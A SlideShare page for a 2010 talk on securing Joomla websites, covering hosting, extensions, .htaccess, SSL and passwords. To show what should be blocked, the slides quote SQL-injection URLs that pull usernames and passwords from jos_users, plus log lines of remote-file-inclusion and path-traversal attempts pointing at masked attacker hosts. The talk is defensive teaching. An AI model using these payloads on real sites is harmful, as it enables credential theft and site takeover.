Security talk:  Fortifying your  Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu...
Where to start? <ul><li>Long before you go on-line
Choose the right hosting
Choose the right components
Inform yourself about good practices ....
.... it means:
You're right here :) </li></ul>Copyright 2010, Sigsiu.NET GmbH
<ul>Choose the right host </ul><ul><li>Apache 2
PHP 5
MySQL 5
htaccess support
Safe Mode Off !!!
Register Globals Off !!!
Access via SFTP
HTTPS/SSL support </li></ul>Copyright 2010, Sigsiu.NET GmbH
<ul>Choose right components </ul><ul>Components published at JED http://extensions.joomla.org/ Check Vulnerable Extensions...
Installing Joomla! Copyright 2010, Sigsiu.NET GmbH
Typical hack attempt ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/ jos_users /* Copyrig...
The point is: be unconventional! <ul><li>Default username is “Admin”
User ID of the first super admin is 62 </li></ul>index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,passw...
Change the super admin user ID http://sobi.it/SuperAdmin/62/ Copyright 2010, Sigsiu.NET GmbH
Main problem <ul>we have to deal with kids with too much time </ul>“ A scriptkiddie, usually a teenager, is a person of  l...
Scriptkiddies <ul><li>Are sometimes randomly successful
Are ambitious
In most cases causing “only” heavy load:
Default Joomla! Site: </li></ul><ul>( ~23 SQL Queries executed + ~15 MB Memory used + ~ 170.000 PHP Instructions ) x </ul>...
htaccess – powerful weapon  .htaccess - (hypertext  access) is the default name of a directory-level configuration file th...
Default Joomla! htaccess Copyright 2010, Sigsiu.NET GmbH
Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] &quot;GET / /administrator/components/com_remos...
Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1&quot;...
Upcoming SlideShare
Loading in...5
×

Security talk: Fortifying your Joomla! website

6,877

Published on

Published in: Technology
2 Comments
11 Likes
Statistics
Notes
  • Very nice Radek! Thanks for sharing.

    Last day I should have cloned myself or something, missed so many good presentations.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • The article, including the full .htaccess example can be found here: http://sobi.it/jab10/p/security/
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
6,877
On Slideshare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
0
Comments
2
Likes
11
Embeds 0
No embeds

No notes for slide
  • Apache 1 and PHP 5 Apache 2 and PHP 4 Apache 1 and MySQL 5 Safe mode isn&apos;t safe at all – quite contrary to. But most important: in most cases if the provider has safe mode enabled he says: I don&apos;t want to care about security so I prohibit everything
  • Security talk: Fortifying your Joomla! website

    1. 1. Security talk: Fortifying your Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
    2. 2. Where to start? <ul><li>Long before you go on-line
    3. 3. Choose the right hosting
    4. 4. Choose the right components
    5. 5. Inform yourself about good practices ....
    6. 6. .... it means:
    7. 7. You're right here :) </li></ul>Copyright 2010, Sigsiu.NET GmbH
    8. 8. <ul>Choose the right host </ul><ul><li>Apache 2
    9. 9. PHP 5
    10. 10. MySQL 5
    11. 11. htaccess support
    12. 12. Safe Mode Off !!!
    13. 13. Register Globals Off !!!
    14. 14. Access via SFTP
    15. 15. HTTPS/SSL support </li></ul>Copyright 2010, Sigsiu.NET GmbH
    16. 16. <ul>Choose right components </ul><ul>Components published at JED http://extensions.joomla.org/ Check Vulnerable Extensions List regularly http://docs.joomla.org/Vulnerable_Extensions_List </ul>Copyright 2010, Sigsiu.NET GmbH
    17. 17. Installing Joomla! Copyright 2010, Sigsiu.NET GmbH
    18. 18. Typical hack attempt ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/ jos_users /* Copyright 2010, Sigsiu.NET GmbH
    19. 19. The point is: be unconventional! <ul><li>Default username is “Admin”
    20. 20. User ID of the first super admin is 62 </li></ul>index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,password+FROM+ jos_users +WHERE+ id=62 ... Copyright 2010, Sigsiu.NET GmbH
    21. 21. Change the super admin user ID http://sobi.it/SuperAdmin/62/ Copyright 2010, Sigsiu.NET GmbH
    22. 22. Main problem <ul>we have to deal with kids with too much time </ul>“ A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit can cause you a great deal of grief” - source Copyright 2010, Sigsiu.NET GmbH
    23. 23. Scriptkiddies <ul><li>Are sometimes randomly successful
    24. 24. Are ambitious
    25. 25. In most cases causing “only” heavy load:
    26. 26. Default Joomla! Site: </li></ul><ul>( ~23 SQL Queries executed + ~15 MB Memory used + ~ 170.000 PHP Instructions ) x </ul>Scriptkiddies up to 100 hack attempts in a minute Copyright 2010, Sigsiu.NET GmbH
    27. 27. htaccess – powerful weapon .htaccess - (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess Copyright 2010, Sigsiu.NET GmbH
    28. 28. Default Joomla! htaccess Copyright 2010, Sigsiu.NET GmbH
    29. 29. Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] &quot;GET / /administrator/components/com_remository/admin.remository.php ?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1&quot; 404 95 &quot;Mozilla/5.0&quot; Copyright 2010, Sigsiu.NET GmbH
    30. 30. Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1&quot; 403 1043 &quot; libwww-perl /5.829 GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1&quot; 403 1029 &quot;Mozilla/3.0 (compatible; Indy Library ) GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1&quot; 403 1029 &quot; Wget /1.1 (compatible; i486; Linux; RedHat7.3) Copyright 2010, Sigsiu.NET GmbH
    31. 31. Prevent most common SQL-Injections 2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] &quot;GET /index.php?option=com_xxxx &id=1/**/ union /**/ select /**/1, concat (username,0x3a,password)... Copyright 2010, Sigsiu.NET GmbH
    32. 33. Disclose as little information as possible
    33. 34. Admin Panel Log-In & FTP
    34. 35. Who can see it? Copyright 2010, Sigsiu.NET GmbH
    35. 36. HTTPS/SSL & SFTP <ul><li>Use SFTP instead of FTP
    36. 37. Use HTTPS for log-in </li></ul>Copyright 2010, Sigsiu.NET GmbH
    37. 38. HTTPS/SSL & SFTP - Problems <ul><li>Provider have to offer SSH/SFTP
    38. 39. Provider have to offer SSL or SSL-Proxy
    39. 40. Invalid SSL-Cert throws error in browser
    40. 41. Valid SSL-Certificates are expensive </li></ul>Copyright 2010, Sigsiu.NET GmbH
    41. 42. HTTPS/SSL - Problems <ul><li>Valid SSL-Certificates are expensive </li></ul>https://www.startssl.com/ Copyright 2010, Sigsiu.NET GmbH
    42. 43. Username & Password <ul>Username is almost so important as password </ul>… once again Copyright 2010, Sigsiu.NET GmbH
    43. 44. Username & Password <ul>Automatic generated password: k5dRGCUxGs </ul>… once again Copyright 2010, Sigsiu.NET GmbH
    44. 45. Username & Password <ul>If we can articulate something, we can remember it </ul>… once again https://pass.sigsiu.net/ Copyright 2010, Sigsiu.NET GmbH
    45. 46. File permissions <ul>Very unlucky number: 777 </ul>Copyright 2010, Sigsiu.NET GmbH
    46. 47. php.ini <ul><li>Disable “dangerous” functions ??!! disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
    47. 48. how can a function be dangerous ??
    48. 49. Use open_basedir
    49. 50. open_basedir = /path/to/www </li></ul>Copyright 2010, Sigsiu.NET GmbH
    50. 51. Is your computer safe? <ul>“ There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software.” Brian Teeman </ul>Copyright 2010, Sigsiu.NET GmbH
    51. 52. But what if .... ? <ul>Backup, Backup, Backup ..... and one more time: Backup </ul>Copyright 2010, Sigsiu.NET GmbH
    52. 53. Thank you for your attention! http://www.Sigsiu.NET https://shop.Sigsiu.NET http://joomla.Sigsiu.NET http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html Copyright 2010, Sigsiu.NET GmbH

    ×